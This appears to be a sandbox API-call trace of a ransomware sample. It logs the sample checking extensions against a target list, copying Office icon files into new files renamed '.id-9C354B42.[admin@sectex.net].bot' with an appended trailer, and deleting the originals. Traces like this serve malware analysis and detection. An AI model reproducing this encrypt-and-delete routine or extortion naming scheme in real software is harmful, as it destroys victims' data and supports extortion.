	[0163.894] WriteFile (in: hFile=0x37c, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0163.894] SetEndOfFile (hFile=0x37c) returned 1
	[0163.894] CloseHandle (hObject=0x37c) returned 1
	[0163.894] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.894] SetEndOfFile (hFile=0x3e8) returned 1
	[0163.905] CloseHandle (hObject=0x3e8) returned 1
	[0163.905] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDCNCLS.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.905] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDCNCLS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdcncls.ico")) returned 1
	[0163.906] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDCNCLS.ICO") returned 66
	[0163.906] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDCNCLS.ICO") returned 66
	[0163.906] lstrlenW (lpString=".doc") returned 4
	[0163.906] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0163.906] lstrlenW (lpString=".docx") returned 5
	[0163.906] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0163.906] lstrlenW (lpString=".pdf") returned 4
	[0163.906] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0163.906] lstrlenW (lpString=".xls") returned 4
	[0163.906] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0163.906] lstrlenW (lpString=".xlsx") returned 5
	[0163.906] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0163.906] lstrlenW (lpString=".ppt") returned 4
	[0163.906] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0163.906] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDCNCLS.ICO") returned 66
	[0163.906] lstrlenW (lpString=".zip") returned 4
	[0163.906] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0163.906] lstrlenW (lpString=".rar") returned 4
	[0163.906] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0163.906] lstrlenW (lpString=".bz2") returned 4
	[0163.906] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0163.906] lstrlenW (lpString=".7z") returned 3
	[0163.906] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0163.906] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDCNCLS.ICO") returned 66
	[0163.906] lstrlenW (lpString=".dbf") returned 4
	[0163.906] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0163.906] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDCNCLS.ICO") returned 66
	[0163.906] lstrlenW (lpString=".1cd") returned 4
	[0163.906] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0163.907] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDCNCLS.ICO") returned 66
	[0163.907] lstrlenW (lpString=".jpg") returned 4
	[0163.907] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0163.907] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDCNCLS.ICO") returned 66
	[0163.907] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDCNCLS.ICO") returned 66
	[0163.907] lstrlenW (lpString=".doc") returned 4
	[0163.907] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0163.907] lstrlenW (lpString=".docx") returned 5
	[0163.907] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0163.907] lstrlenW (lpString=".pdf") returned 4
	[0163.907] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0163.907] lstrlenW (lpString=".xls") returned 4
	[0163.907] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0163.907] lstrlenW (lpString=".xlsx") returned 5
	[0163.907] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0163.907] lstrlenW (lpString=".ppt") returned 4
	[0163.907] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0163.907] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDCNCLS.ICO") returned 66
	[0163.907] lstrlenW (lpString=".zip") returned 4
	[0163.907] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0163.907] lstrlenW (lpString=".rar") returned 4
	[0163.907] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0163.907] lstrlenW (lpString=".bz2") returned 4
	[0163.907] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0163.907] lstrlenW (lpString=".7z") returned 3
	[0163.907] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0163.907] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDCNCLS.ICO") returned 66
	[0163.907] lstrlenW (lpString=".dbf") returned 4
	[0163.907] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0163.907] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDCNCLS.ICO") returned 66
	[0163.907] lstrlenW (lpString=".1cd") returned 4
	[0163.907] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0163.907] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDCNCLS.ICO") returned 66
	[0163.907] lstrlenW (lpString=".jpg") returned 4
	[0163.908] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0163.908] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0163.908] lstrlenW (lpString="SCDRESPL.ICO") returned 12
	[0163.908] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESPL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdrespl.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0163.908] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=1078) returned 1
	[0163.908] CloseHandle (hObject=0x3e8) returned 1
	[0163.908] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESPL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdrespl.ico")) returned 0x20
	[0163.908] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESPL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdrespl.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.909] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESPL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdrespl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0163.909] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.909] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.909] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESPL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdrespl.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0163.910] GetLastError () returned 0x0
	[0163.910] ReadFile (in: hFile=0x3e8, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x436, lpOverlapped=0x0) returned 1
	[0163.911] WriteFile (in: hFile=0x37c, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x440, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x440, lpOverlapped=0x0) returned 1
	[0163.912] ReadFile (in: hFile=0x3e8, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.912] WriteFile (in: hFile=0x37c, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0163.912] SetEndOfFile (hFile=0x37c) returned 1
	[0163.912] CloseHandle (hObject=0x37c) returned 1
	[0163.912] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.912] SetEndOfFile (hFile=0x3e8) returned 1
	[0163.915] CloseHandle (hObject=0x3e8) returned 1
	[0163.915] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESPL.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.915] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESPL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdrespl.ico")) returned 1
	[0163.916] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESPL.ICO") returned 66
	[0163.916] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESPL.ICO") returned 66
	[0163.916] lstrlenW (lpString=".doc") returned 4
	[0163.916] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0163.916] lstrlenW (lpString=".docx") returned 5
	[0163.916] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0163.916] lstrlenW (lpString=".pdf") returned 4
	[0163.916] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0163.916] lstrlenW (lpString=".xls") returned 4
	[0163.916] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0163.916] lstrlenW (lpString=".xlsx") returned 5
	[0163.916] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0163.916] lstrlenW (lpString=".ppt") returned 4
	[0163.916] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0163.916] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESPL.ICO") returned 66
	[0163.916] lstrlenW (lpString=".zip") returned 4
	[0163.916] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0163.916] lstrlenW (lpString=".rar") returned 4
	[0163.916] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0163.916] lstrlenW (lpString=".bz2") returned 4
	[0163.916] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0163.916] lstrlenW (lpString=".7z") returned 3
	[0163.916] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0163.916] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESPL.ICO") returned 66
	[0163.916] lstrlenW (lpString=".dbf") returned 4
	[0163.916] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0163.916] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESPL.ICO") returned 66
	[0163.916] lstrlenW (lpString=".1cd") returned 4
	[0163.916] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0163.916] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESPL.ICO") returned 66
	[0163.916] lstrlenW (lpString=".jpg") returned 4
	[0163.916] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0163.917] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESPL.ICO") returned 66
	[0163.917] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESPL.ICO") returned 66
	[0163.917] lstrlenW (lpString=".doc") returned 4
	[0163.917] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0163.917] lstrlenW (lpString=".docx") returned 5
	[0163.917] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0163.917] lstrlenW (lpString=".pdf") returned 4
	[0163.917] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0163.917] lstrlenW (lpString=".xls") returned 4
	[0163.917] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0163.917] lstrlenW (lpString=".xlsx") returned 5
	[0163.917] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0163.917] lstrlenW (lpString=".ppt") returned 4
	[0163.917] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0163.917] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESPL.ICO") returned 66
	[0163.917] lstrlenW (lpString=".zip") returned 4
	[0163.917] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0163.917] lstrlenW (lpString=".rar") returned 4
	[0163.917] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0163.917] lstrlenW (lpString=".bz2") returned 4
	[0163.917] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0163.917] lstrlenW (lpString=".7z") returned 3
	[0163.917] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0163.917] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESPL.ICO") returned 66
	[0163.917] lstrlenW (lpString=".dbf") returned 4
	[0163.917] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0163.917] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESPL.ICO") returned 66
	[0163.917] lstrlenW (lpString=".1cd") returned 4
	[0163.917] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0163.917] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESPL.ICO") returned 66
	[0163.917] lstrlenW (lpString=".jpg") returned 4
	[0163.917] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0163.918] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0163.918] lstrlenW (lpString="SCDRESPS.ICO") returned 12
	[0163.918] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESPS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdresps.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0163.918] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=2998) returned 1
	[0163.918] CloseHandle (hObject=0x3e8) returned 1
	[0163.918] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESPS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdresps.ico")) returned 0x20
	[0163.918] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESPS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdresps.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.919] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESPS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdresps.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0163.919] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.919] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.919] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESPS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdresps.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0163.919] GetLastError () returned 0x0
	[0163.919] ReadFile (in: hFile=0x3e8, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0xbb6, lpOverlapped=0x0) returned 1
	[0164.104] WriteFile (in: hFile=0x37c, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xbc0, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xbc0, lpOverlapped=0x0) returned 1
	[0164.392] ReadFile (in: hFile=0x3e8, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0164.392] WriteFile (in: hFile=0x37c, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0164.392] SetEndOfFile (hFile=0x37c) returned 1
	[0164.392] CloseHandle (hObject=0x37c) returned 1
	[0164.392] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.392] SetEndOfFile (hFile=0x3e8) returned 1
	[0164.394] CloseHandle (hObject=0x3e8) returned 1
	[0164.395] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESPS.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0164.395] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESPS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdresps.ico")) returned 1
	[0164.395] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESPS.ICO") returned 66
	[0164.395] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESPS.ICO") returned 66
	[0164.396] lstrlenW (lpString=".doc") returned 4
	[0164.396] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0164.396] lstrlenW (lpString=".docx") returned 5
	[0164.396] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0164.396] lstrlenW (lpString=".pdf") returned 4
	[0164.396] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0164.396] lstrlenW (lpString=".xls") returned 4
	[0164.396] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0164.396] lstrlenW (lpString=".xlsx") returned 5
	[0164.396] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0164.396] lstrlenW (lpString=".ppt") returned 4
	[0164.396] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0164.396] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESPS.ICO") returned 66
	[0164.396] lstrlenW (lpString=".zip") returned 4
	[0164.396] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0164.396] lstrlenW (lpString=".rar") returned 4
	[0164.396] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0164.396] lstrlenW (lpString=".bz2") returned 4
	[0164.396] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0164.396] lstrlenW (lpString=".7z") returned 3
	[0164.396] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0164.396] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESPS.ICO") returned 66
	[0164.396] lstrlenW (lpString=".dbf") returned 4
	[0164.396] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0164.396] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESPS.ICO") returned 66
	[0164.396] lstrlenW (lpString=".1cd") returned 4
	[0164.396] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0164.396] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESPS.ICO") returned 66
	[0164.396] lstrlenW (lpString=".jpg") returned 4
	[0164.396] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0164.396] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESPS.ICO") returned 66
	[0164.396] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESPS.ICO") returned 66
	[0164.396] lstrlenW (lpString=".doc") returned 4
	[0164.397] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0164.397] lstrlenW (lpString=".docx") returned 5
	[0164.397] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0164.397] lstrlenW (lpString=".pdf") returned 4
	[0164.397] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0164.397] lstrlenW (lpString=".xls") returned 4
	[0164.397] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0164.397] lstrlenW (lpString=".xlsx") returned 5
	[0164.397] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0164.397] lstrlenW (lpString=".ppt") returned 4
	[0164.397] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0164.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESPS.ICO") returned 66
	[0164.397] lstrlenW (lpString=".zip") returned 4
	[0164.397] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0164.397] lstrlenW (lpString=".rar") returned 4
	[0164.397] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0164.397] lstrlenW (lpString=".bz2") returned 4
	[0164.397] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0164.397] lstrlenW (lpString=".7z") returned 3
	[0164.397] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0164.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESPS.ICO") returned 66
	[0164.397] lstrlenW (lpString=".dbf") returned 4
	[0164.397] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0164.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESPS.ICO") returned 66
	[0164.397] lstrlenW (lpString=".1cd") returned 4
	[0164.397] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0164.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESPS.ICO") returned 66
	[0164.397] lstrlenW (lpString=".jpg") returned 4
	[0164.397] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0164.397] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0164.398] lstrlenW (lpString="SIGNL.ICO") returned 9
	[0164.398] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGNL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\signl.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0164.542] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=1078) returned 1
	[0164.542] CloseHandle (hObject=0x3b8) returned 1
	[0164.542] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGNL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\signl.ico")) returned 0x20
	[0164.543] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGNL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\signl.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0164.543] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGNL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\signl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0164.543] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.543] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.543] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGNL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\signl.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0164.544] GetLastError () returned 0x0
	[0164.544] ReadFile (in: hFile=0x3b8, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x436, lpOverlapped=0x0) returned 1
	[0164.576] WriteFile (in: hFile=0x25c, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x440, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x440, lpOverlapped=0x0) returned 1
	[0164.577] ReadFile (in: hFile=0x3b8, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
